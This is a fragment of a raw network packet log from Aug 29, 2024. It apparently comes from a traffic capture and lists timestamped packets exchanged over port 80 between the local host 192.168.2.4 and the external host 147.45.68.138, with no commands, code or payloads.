                                                      Aug 29, 2024 22:52:26.918324947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918382883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918394089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918404102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918415070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.918576002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961570978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961584091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961594105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961604118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961616039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961626053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961658001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961669922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961678982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961707115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961718082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961747885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961760044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961765051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961765051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961765051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961765051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961776972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961782932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961782932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961791039 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961800098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961805105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961817980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961823940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961823940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961842060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961857080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961874962 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961885929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961894035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961905003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961913109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961916924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961919069 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961939096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961941957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961954117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961962938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961963892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961975098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.961987972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.961993933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962009907 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962033987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962191105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962233067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962265968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962305069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962311029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962342978 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962380886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962393045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962403059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962414026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962419987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962444067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962462902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962474108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962485075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962502956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962513924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962517977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962521076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962529898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962538958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962541103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962558985 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962565899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962572098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962584972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962596893 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962605953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962618113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962624073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962630033 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962639093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962641001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962654114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962662935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962687969 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962694883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962706089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962713957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962733030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962752104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962855101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962898016 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962941885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962953091 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962974072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962980032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962986946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.962987900 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.962997913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963007927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963011980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963018894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963032961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963052988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963089943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963102102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963112116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963121891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963129044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963135004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963145971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963154078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963156939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963165998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963192940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963233948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963243961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963259935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963268995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963269949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963288069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963293076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963299990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963310003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963315010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963321924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.963330984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963352919 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.963375092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964026928 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964054108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964062929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964063883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964087009 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964098930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964098930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964111090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964121103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964132071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964135885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964149952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964165926 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964196920 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964207888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964226007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964232922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964243889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964256048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964258909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964267015 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964267969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964287996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964307070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964308023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964318037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964328051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964339972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964356899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964374065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964399099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964409113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964418888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964433908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964451075 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964487076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964498997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964523077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964524984 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964538097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964545012 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964550972 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964562893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964566946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964579105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964581013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964589119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964591980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964602947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964605093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964620113 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964631081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964642048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964643002 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964652061 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964668036 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964677095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964695930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964705944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964715958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964725018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964736938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964741945 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964760065 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964761019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964771986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964780092 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964782953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964795113 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:26.964807034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:26.964832067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.005100965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005111933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005120993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005132914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005142927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005153894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005163908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005175114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.005270958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.005270958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.005270958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048537016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048548937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048558950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048568964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048580885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048589945 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048598051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048614979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048633099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048701048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048712969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048721075 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048731089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048741102 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048741102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048752069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048754930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048774958 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048798084 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048862934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048873901 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048882961 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.048899889 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.048913956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049034119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049045086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049055099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049067020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049077034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049081087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049086094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049098969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049099922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049109936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049122095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049130917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049130917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049143076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049165964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049324036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049335957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049345016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049355030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.049365044 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.049391031 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.082385063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.087297916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268141985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268204927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268217087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268255949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268268108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268304110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268315077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268326998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268327951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268327951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268327951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268327951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268366098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268366098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268372059 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268383980 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268408060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268415928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268420935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268424988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268434048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268440008 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268448114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268460035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268486977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268486977 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268630981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268642902 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268655062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268666983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268676996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268703938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268707991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268719912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268731117 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268743038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268744946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268755913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268767118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268769979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268791914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268793106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268805981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268816948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268819094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268831015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268837929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268862963 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268902063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268923044 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268938065 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268946886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268961906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.268964052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268980026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.268999100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269004107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269016027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269017935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269017935 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269032955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269035101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269043922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269053936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269056082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269062996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269068956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269081116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269085884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269093990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269099951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:27.269108057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:27.269126892 CEST4973980192.168.2.4147.45.68.138
